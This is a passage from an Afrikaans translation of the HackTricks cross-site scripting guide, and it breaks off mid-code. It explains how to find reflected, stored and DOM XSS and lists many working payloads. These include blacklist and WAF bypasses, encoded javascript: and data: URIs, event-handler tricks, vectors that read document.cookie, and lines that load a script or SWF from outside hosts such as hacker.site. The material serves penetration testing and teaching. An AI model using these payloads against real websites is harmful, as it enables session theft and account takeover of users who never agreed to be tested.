hacktricks/pentesting-web/xss-cross-site-scripting/README.md

# XSS (Cross Site Scripting)

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

As jy belangstel in **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die aanstel!** (_vloeiende Pools geskrewe en gesproke vereis_).

{% embed url="https://www.stmcyber.com/careers" %}

## Metodologie

1. Kontroleer of **enige waarde wat jy beheer** (_parameters_, _pad_, _koppe_?, _koekies_?) in die HTML **weerspieël** word of deur **JS**-kode **gebruik** word.
2. Vind die konteks waar dit weerspieël/gebruik word.
3. Indien **weerspieël**
1. Kontroleer **watter simbole jy kan gebruik** en afhangende daarvan, berei die lading voor:
1. In **rou HTML**:
1. Kan jy nuwe HTML-etikette skep?
2. Kan jy gebeure of eienskappe gebruik wat die `javascript:` protokol ondersteun?
3. Kan jy beskerming omseil?
4. Word die HTML-inhoud deur enige kliëntkant-JS-enjin geïnterpreteer (_AngularJS_, _VueJS_, _Mavo_...), jy kan 'n [**Kliëntkant-sjablooninspuiting**](../client-side-template-injection-csti.md) misbruik.
5. As jy nie HTML-etikette kan skep wat JS-kode uitvoer nie, kan jy 'n [**Hangende Merk - HTML-skriptlose inspuiting**](../dangling-markup-html-scriptless-injection/) misbruik?
2. Binne 'n **HTML-etiket**:
1. Kan jy na rou HTML-konteks ontsnap?
2. Kan jy nuwe gebeure/eienskappe skep om JS-kode uit te voer?
3. Ondersteun die eienskap waarin jy vasgevang is JS-uitvoering?
4. Kan jy beskerming omseil?
3. Binne **JavaScript-kode**:
1. Kan jy die `<script>`-etiket ontsnap?
2. Kan jy die string ontsnap en verskillende JS-kode uitvoer?
3. Is jou insette in sjabloonliterale \`\`?
4. Kan jy beskerming omseil?
4. JavaScript **funksie** wat **uitgevoer** word
1. Jy kan die naam van die funksie aandui om uit te voer. bv.: `?callback=alert(1)`
4. Indien **gebruik**:
1. Jy kan 'n **DOM XSS** uitbuit, let op hoe jou inset beheer word en of jou **beheerde inset deur enige sink gebruik word**.

Wanneer jy aan 'n komplekse XSS werk, mag jy dit interessant vind om van die volgende te weet:

{% content-ref url="debugging-client-side-js.md" %}
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}

## Weerspieëlde waardes

Om 'n XSS suksesvol uit te buit, is die eerste ding wat jy moet vind 'n **waarde wat deur jou beheer word en wat in die webbladsy weerspieël word**.

* **Tussenliggend weerspieël**: As jy vind dat die waarde van 'n parameter of selfs die pad in die webbladsy weerspieël word, kan jy 'n **Weerspieëlde XSS** uitbuit.
* **Gestoor en weerspieël**: As jy vind dat 'n waarde wat deur jou beheer word in die bediener gestoor word en elke keer as jy 'n bladsy besoek weerspieël word, kan jy 'n **Gestoorde XSS** uitbuit.
* **Toegang via JS**: As jy vind dat 'n waarde wat deur jou beheer word deur JS gebruik word, kan jy 'n **DOM XSS** uitbuit.

## Kontekste

Wanneer jy probeer om 'n XSS uit te buit, is die eerste ding wat jy moet weet **waar jou inset weerspieël word**. Afhangende van die konteks, sal jy arbitrêre JS-kode op verskillende maniere kan uitvoer.

### Rou HTML

As jou inset **weerspieël word op die rou HTML**-bladsy, sal jy enige **HTML-etiket** moet misbruik om JS-kode uit te voer: `<img , <iframe , <svg , <script` ... dit is net 'n paar van die vele moontlike HTML-etikette wat jy kan gebruik.\
Hou ook [Kliëntkant-sjablooninspuiting](../client-side-template-injection-csti.md) in gedagte.

### Binne HTML-etiketattribuut

As jou inset binne die waarde van die attribuut van 'n etiket weerspieël word, kan jy probeer:

1. Om **uit die attribuut en uit die etiket te ontsnap** (dan sal jy in die rou HTML wees) en nuwe HTML-etiket skep om te misbruik: `"><img [...]`
2. As jy **uit die attribuut kan ontsnap maar nie uit die etiket nie** (`>` is gekodeer of verwyder), afhangende van die etiket kan jy 'n **gebeurtenis skep** wat JS-kode uitvoer: `" autofocus onfocus=alert(1) x="`
3. As jy **nie uit die attribuut kan ontsnap nie** (`"` word gekodeer of verwyder), dan afhangende van **watter attribuut** jou waarde weerspieël en **of jy al die waarde beheer of net 'n deel daarvan** sal jy dit kan misbruik. Byvoorbeeld, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy arbitrêre kode kan laat uitvoer wanneer dit geklik word. 'n Ander interessante **voorbeeld** is die attribuut `href`, waar jy die `javascript:` protokol kan gebruik om arbitrêre kode uit te voer: **`href="javascript:alert(1)"`**
4. As jou inset binne "**onuitbuitbare etikette**" weerspieël word, kan jy die **`accesskey`-truk** probeer om die kwesbaarheid te misbruik (jy sal 'n soort sosiale ingenieur nodig hê om dit te misbruik): **`" accesskey="x" onclick="alert(1)" x="`**

Vreemde voorbeeld van Angular wat XSS uitvoer as jy 'n klassenaam beheer:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
### Binne JavaScript-kode

In hierdie geval word jou inset weerspieël tussen **`<script> [...] </script>`** etikette van 'n HTML-bladsy, binne 'n `.js` lêer of binne 'n eienskap wat die **`javascript:`** protokol gebruik:

* As dit weerspieël word tussen **`<script> [...] </script>`** etikette, selfs as jou inset binne enige soort aanhalingstekens is, kan jy probeer om `</script>` in te spuit en te ontsnap uit hierdie konteks. Dit werk omdat die **blaaier eers die HTML-etikette sal ontledig** en dan die inhoud, daarom sal dit nie agterkom dat jou ingespotte `</script>` etiket binne die HTML-kode is nie.
* As dit weerspieël word **binne 'n JS-string** en die vorige truuk nie werk nie, sal jy die string moet **verlaat**, jou kode **uitvoer** en die JS-kode **herkonstrueer** (as daar enige fout is, sal dit nie uitgevoer word nie):
  * `'-alert(1)-'`
  * `';-alert(1)//`
  * `\';alert(1)//`
* As dit binne sjabloonliterale weerspieël word, kan jy **JS-uitdrukkings** inbed met behulp van `${ ... }` sintaksis: `` var greetings = `Hello, ${alert(1)}` ``
* **Unicode-kodering** werk om **geldige javascript-kode** te skryf:
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
#### Javascript Hoisting

Javascript Hoisting verwys na die geleentheid om **funksies, veranderlikes of klasse te verklaar nadat hulle gebruik is sodat jy scenarios kan misbruik waar 'n XSS onverklaarde veranderlikes of funksies gebruik.**\
**Kyk na die volgende bladsy vir meer inligting:**

{% content-ref url="js-hoisting.md" %}
[js-hoisting.md](js-hoisting.md)
{% endcontent-ref %}

### Javascript Funksie

Verskeie webbladsye het eindpunte wat **die naam van die funksie aanvaar as parameter om uit te voer**. 'n Algemene voorbeeld wat in die wild gesien word, is iets soos: `?callback=callbackFunc`.

'N Goeie manier om uit te vind of iets wat direk deur die gebruiker gegee word, probeer uitgevoer word, is om **die paramwaarde te wysig** (byvoorbeeld na 'Vulnerable') en in die konsole te kyk vir foute soos:

![](<../../.gitbook/assets/image (651) (2).png>)

Indien dit vatbaar is, kan jy dalk 'n **waarskuwing aktiveer** deur net die waarde te stuur: **`?callback=alert(1)`**. Dit is egter baie algemeen dat hierdie eindpunte die inhoud **valideer** om slegs letters, syfers, kolletjies en onderstrepe toe te laat (**`[\w\._]`**).

Nietemin is dit steeds moontlik om sekere aksies uit te voer selfs met daardie beperking. Dit is omdat jy daardie geldige karakters kan gebruik om enige element in die DOM **te benader**:

![](<../../.gitbook/assets/image (662).png>)

Sommige nuttige funksies hiervoor:
```
firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement
```
Jy kan ook probeer om **Javascript funksies direk te trigger**: `obj.sales.delOrders`.

Gewoonlik is die eindpunte wat die aangeduide funksie uitvoer eindpunte sonder baie interessante DOM, **ander bladsye in dieselfde oorsprong** sal 'n **meer interessante DOM** hê om meer aksies uit te voer.

Daarom is die **Selfde Oorsprong Metode Uitvoering (SOME)** uitbuiting ontwikkel om hierdie kwesbaarheid in 'n ander DOM te **misbruik**:

{% content-ref url="some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](some-same-origin-method-execution.md)
{% endcontent-ref %}

### DOM

Daar is **JS-kode** wat **onveilig** van 'n aanvaller beheerde data gebruik soos `location.href`. 'n Aanvaller kan dit misbruik om arbitrêre JS-kode uit te voer.

{% content-ref url="dom-xss.md" %}
[dom-xss.md](dom-xss.md)
{% endcontent-ref %}

### **Universale XSS**

Hierdie soort XSS kan **oral** gevind word. Dit hang nie net af van die kliënt-uitbuiting van 'n webtoepassing nie, maar van **enige** **konteks**. Hierdie soort **arbitrêre JavaScript-uitvoering** kan selfs misbruik word om **RCE** te verkry, **arbitrêre lêers te lees** op kliënte en bedieners, en meer.\
Sommige **voorbeelde**:

{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
{% endcontent-ref %}

{% content-ref url="../../network-services-pentesting/pentesting-web/electron-desktop-apps/" %}
[electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
{% endcontent-ref %}

## WAF omseil enkodering van afbeelding

![van https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)

## Insit in rou HTML

Wanneer jou inset **binne die HTML-bladsy** gereflekteer word of jy HTML-kode kan ontsnap en insit in hierdie konteks, is die **eerste** ding wat jy moet doen, om te kyk of jy `<` kan misbruik om nuwe etikette te skep: Probeer net daardie **karakter** weerspieël en kyk of dit **HTML-geënkodeer** word of **verwyder** word of as dit sonder veranderinge **weerspieël** word. **Slegs in die laaste geval sal jy hierdie geval kan uitbuit**.\
Vir hierdie gevalle moet jy ook in gedagte hou [**Kliëntkant Sjablooninspuiting**](../client-side-template-injection-csti.md)**.**\
_**Nota: 'n HTML-kommentaar kan gesluit word met**** ****`-->`**** ****of**** ****`--!>`**_

In hierdie geval, en as geen swartlys/witlys gebruik word nie, kan jy ladingstukke soos gebruik:
```html
<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>
```
Maar, as tags/kenmerke swart/witlys gebruik word, sal jy nodig hê om **brute-force watter tags** jy kan skep.\
Sodra jy **gevind het watter tags toegelaat is**, sal jy nodig hê om **brute-force kenmerke/gebeurtenisse** binne die gevonde geldige tags te sien om uit te vind hoe jy die konteks kan aanval.

### Tags/Gebeurtenisse brute-force

Gaan na [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) en klik op _**Kopieer tags na knipbord**_. Stuur dan almal met Burp intruder en kontroleer of enige tags nie as skadelik deur die WAF ontdek is nie. Sodra jy ontdek het watter tags jy kan gebruik, kan jy **brute force al die gebeurtenisse** gebruik deur die geldige tags (op dieselfde webbladsy klik op _**Kopieer gebeurtenisse na knipbord**_ en volg dieselfde prosedure as voorheen).

### Aangepaste tags

As jy geen geldige HTML-tag gevind het nie, kan jy probeer om **'n aangepaste tag te skep** en JS-kode uit te voer met die `onfocus` kenmerk. In die XSS-versoek, moet jy die URL eindig met `#` om die bladsy **te fokus op daardie objek** en die kode **uit te voer**:
```
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
```
### Swartlys Verbygaan

Indien 'n soort swartlys gebruik word, kan jy probeer om dit te verbygaan met 'n paar dom truuks:
```javascript
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```
### Lengte oorskryding (klein XSSs)

{% hint style="info" %}
**Meer klein XSS vir verskillende omgewings** lading [**kan hier gevind word**](https://github.com/terjanq/Tiny-XSS-Payloads) en [**hier**](https://tinyxss.terjanq.me).
{% endhint %}
```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>
```
Die laaste een maak gebruik van 2 Unicode karakters wat uitbrei na 5: telsr\
Meer van hierdie karakters kan gevind word [hier](https://www.unicode.org/charts/normalization/).\
Om te kontroleer watter karakters ontbind is, kyk [hier](https://www.compart.com/en/unicode/U+2121).

### Kliek XSS - Clickjacking

Indien jy die kwesbaarheid wil uitbuit deur die **gebruiker te laat kliek op 'n skakel of 'n vorm** met vooraf ingevulde data, kan jy probeer om [**Clickjacking te misbruik**](../clickjacking.md#xss-clickjacking) (as die bladsy kwesbaar is).

### Onmoontlik - Hangende Opmaak

Indien jy net dink dat **dit onmoontlik is om 'n HTML-tag met 'n eienskap te skep om JS-kode uit te voer**, moet jy [**Hangende Opmaak**](../dangling-markup-html-scriptless-injection/) nagaan omdat jy die kwesbaarheid kan **uitbuit** sonder om **JS**-kode uit te voer.

## Inspruiting binne HTML-tag

### Binne die tag/ontsnapping vanaf attribuutwaarde

Indien jy **binne 'n HTML-tag** is, kan jy eerste probeer om te **ontsnap** van die tag en van die tegnieke wat genoem word in die [vorige afdeling](./#injecting-inside-raw-html) gebruik maak om JS-kode uit te voer.\
Indien jy **nie kan ontsnap van die tag nie**, kan jy nuwe eienskappe binne die tag skep om te probeer om JS-kode uit te voer, byvoorbeeld deur 'n payload te gebruik (_let daarop dat in hierdie voorbeeld dubbele aanhalingstekens gebruik word om te ontsnap van die eienskap, jy sal hulle nie nodig hê as jou inset direk binne die tag weerspieël word_):
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
```
**Stylgebeure**
```python
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### Binne die attribuut

Selfs as jy **nie kan ontsnap van die attribuut nie** (`"` word gekodeer of verwyder), afhangende van **watter attribuut** jou waarde weerspieël as jy al die waarde beheer of net 'n deel daarvan, sal jy dit kan misbruik. By **voorbeeld**, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit kan maak om willekeurige kode uit te voer wanneer dit geklik word.\
'n Ander interessante **voorbeeld** is die attribuut `href`, waar jy die `javascript:` protokol kan gebruik om willekeurige kode uit te voer: **`href="javascript:alert(1)"`**

**Deurdring binne gebeurtenis deur HTML-kodering/URL-kodering**

Die **HTML-gekodeerde karakters** binne die waarde van HTML-etiketatribute word tydens uitvoering **gedekodeer**. Daarom sal iets soos die volgende geldig wees (die lading is vetgedruk): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`

Merk op dat **enige soort HTML-kodering geldig is**:
```javascript
//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>
```
**Let wel dat URL-kodering ook sal werk:**
```python
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
```
**Deur Unicode-kodering binne 'n gebeurtenis te omseil**
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```
### Spesiale Protokolle binne die attribuut

Daar kan jy die protokolle **`javascript:`** of **`data:`** op sommige plekke gebruik om **arbitrêre JS-kode uit te voer**. Sommige sal gebruikerinteraksie vereis en ander nie.
```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
**Plekke waar jy hierdie protokolle kan inspuit**

**In die algemeen** kan die `javascript:` protokol **gebruik word in enige tag wat die attribuut `href` aanvaar** en in **die meeste** van die tags wat die **attribuut `src`** aanvaar (maar nie `<img`)
```markup
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
```
**Ander verduisteringstreke**

_**In hierdie geval is die HTML-kodering en die Unicode-koderingstrik van die vorige afdeling ook geldig omdat jy binne 'n attribuut is.**_
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
Verder is daar nog 'n **mooi truuk** vir hierdie gevalle: **Selfs as jou inset binne `javascript:...` URL-gekodeer is, sal dit URL-ontkodeer word voordat dit uitgevoer word.** Dus, as jy moet **ontsnapping** van die **string** gebruik deur 'n **enkellid** en jy sien dat **dit URL-gekodeer word**, onthou dat **dit nie saak maak nie,** dit sal tydens die **uitvoertyd** as 'n **enkellid** geïnterpreteer word.
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
Merk op dat as jy probeer om **beide** `URLencode + HTMLencode` in enige volgorde te gebruik om die **payload** te kodeer, sal dit **nie werk nie**, maar jy kan hulle **binne die payload meng**.

**Die gebruik van Hex en Octal kodeer met `javascript:`**

Jy kan **Hex** en **Octal kodeer** binne die `src` eienskap van `iframe` (ten minste) gebruik om **HTML-etikette te verklaar om JS uit te voer**:
```javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
### Omgekeerde tab nabbing
```javascript
<a target="_blank" rel="opener"
```
Indien jy enige URL kan inspuit in 'n willekeurige **`<a href=`** tag wat die **`target="_blank" en rel="opener"`** eienskappe bevat, kontroleer die **volgende bladsy om hierdie gedrag te benut**:

{% content-ref url="../reverse-tab-nabbing.md" %}
[reverse-tab-nabbing.md](../reverse-tab-nabbing.md)
{% endcontent-ref %}

### op Gebeurtenishanterers Omgang

Eerstens, kontroleer hierdie bladsy ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) vir nuttige **"on" gebeurtenishanterers**.\
In geval daar 'n swartlys is wat voorkom dat jy hierdie gebeurtenishanterers kan skep, kan jy die volgende omseilings probeer:
```javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
### XSS in "Onuitbuitbare tages" (verborge invoer, skakel, kanonieke, meta)

Vanaf [**hier**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **is dit nou moontlik om verborge invoere te misbruik met:**
```html
<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle=alert(1)>
```
En in **meta-tages**:
```html
<!-- Injection inside meta attribute-->
<meta name="apple-mobile-web-app-title" content=""Twitter popover id="newsletter" onbeforetoggle=alert(2) />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
Van [**hier**](https://portswigger.net/research/xss-in-hidden-input-fields): Jy kan 'n **XSS-lading binne 'n verborge atribuut** uitvoer, mits jy die **slagoffer** kan **oortuig** om die **sleutelkombinasie** te druk. Op Firefox Windows/Linux is die sleutelkombinasie **ALT+SHIFT+X** en op OS X is dit **CTRL+ALT+X**. Jy kan 'n ander sleutelkombinasie spesifiseer deur 'n ander sleutel in die toegangssleutel atribuut te gebruik. Hier is die vektor:
```markup
<input type="hidden" accesskey="X" onclick="alert(1)">
```
**Die XSS-lading sal iets soos hierdie wees: `" accesskey="x" onclick="alert(1)" x="`**

### Swartlys Verbygaan

Verskeie truuks met die gebruik van verskillende enkodering is reeds binne hierdie afdeling blootgestel. Gaan **terug om te leer waar jy kan gebruik:**

* **HTML enkodering (HTML-etikette)**
* **Unicode enkodering (kan geldige JS-kode wees):** `\u0061lert(1)`
* **URL enkodering**
* **Heks en Oktale enkodering**
* **data enkodering**

**Verbygaan vir HTML-etikette en eienskappe**

Lees die [Swartlys Verbygaan van die vorige afdeling](./#blacklist-bypasses).

**Verbygaan vir JavaScript-kode**

Lees die [JavaScript-verbygaan swartlys van die volgende afdeling](./#javascript-bypass-blacklists-techniques).

### CSS-Gadgets

As jy 'n **XSS in 'n baie klein deel** van die web gevind het wat 'n soort interaksie vereis (miskien 'n klein skakel in die voetnota met 'n onmouseover element), kan jy probeer om **die spasie wat daardie element inneem te wysig** om die kanse te maksimeer om die skakel te laat afgaan.

Byvoorbeeld, jy kan bietjie styl by die element voeg soos: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`

Maar, as die WAF die styl-eienskap filter, kan jy CSS Styling Gadgets gebruik, so as jy byvoorbeeld vind

> .toets {display:block; color: blue; width: 100%\}

en

> \#someid {top: 0; font-family: Tahoma;}

Nou kan jy ons skakel wysig en dit na die vorm bring

> \<a href="" id=someid class=test onclick=alert() a="">

Hierdie truuk is geneem van [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)

## Ins spuit binne JavaScript-kode

In hierdie geval word jou **inset** binne die JS-kode van 'n `.js`-lêer of tussen `<script>...</script>`-etikette of tussen HTML-gebeurtenisse wat JS-kode kan uitvoer of tussen eienskappe wat die `javascript:`-protokol aanvaar, weerspieël.

### Ontsnapping van die \<script>-etiket

As jou kode binne `<script> [...] var input = 'weerspieëlde data' [...] </script>` ingevoeg word, kan jy maklik die **ontsnapping van die sluiting van die `<script>`**-etiket:
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
Merk op dat in hierdie voorbeeld ons selfs nie die enkelkwotasie gesluit het nie. Dit is omdat HTML-analise word eerste deur die webblaaier uitgevoer, wat die identifisering van bladsyelemente insluit, insluitend blokke van skrips. Die analise van JavaScript om die ingeslote skripte te verstaan en uit te voer, word eers daarna uitgevoer.

### Binne JS-kode

As `<>` gesaniteer word, kan jy steeds die string ontvlug waar jou inset geplaas is en arbitêre JS uitvoer. Dit is belangrik om JS-sintaks te regstel, want as daar enige foute is, sal die JS-kode nie uitgevoer word nie:
```
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
```
### Sjabloonliterale \`\`

Om **strings** saam te stel, behalwe enkel en dubbele aanhalingstekens, aanvaar JS ook **backticks** **` `` `**. Dit staan bekend as sjabloonliterale omdat hulle toelaat om **ingeslote JS-uitdrukkings** te gebruik deur `${ ... }`-sintaksis.\
Dus, as jy vind dat jou inset binne 'n JS-string wat backticks gebruik, **weerspieël** word, kan jy die sintaksis `${ ... }` misbruik om **willekeurige JS-kode** uit te voer:

Dit kan **misbruik** word deur:
```javascript
`${alert(1)}`
`${`${`${`${alert(1)}`}`}`}`
```

```````````````javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop(){return loop}
loop``````````````
```````````````
### Geënkripteerde kode-uitvoering
```markup
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
```
### Unicode Encode JS uitvoering
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
### JavaScript omseil swartlys tegnieke

**Strings**
```javascript
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```
**Spesiale ontsnappings**
```javascript
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
// Any other char escaped is just itself
```
**Spasie-vervanging binne JS-kode**
```javascript
<TAB>
/**/
```
**JavaScript kommentaar (vanaf** [**JavaScript Kommentaar**](./#javascript-comments) **truc)**
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
```
**JavaScript nuwe lyne (vanaf** [**JavaScript nuwe lyn**](./#javascript-new-lines) **truc)**
```javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10); alert('//\nalert(1)') //0x0a
String.fromCharCode(13); alert('//\ralert(1)') //0x0d
String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
```
**JavaScript spasies**
```javascript
log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
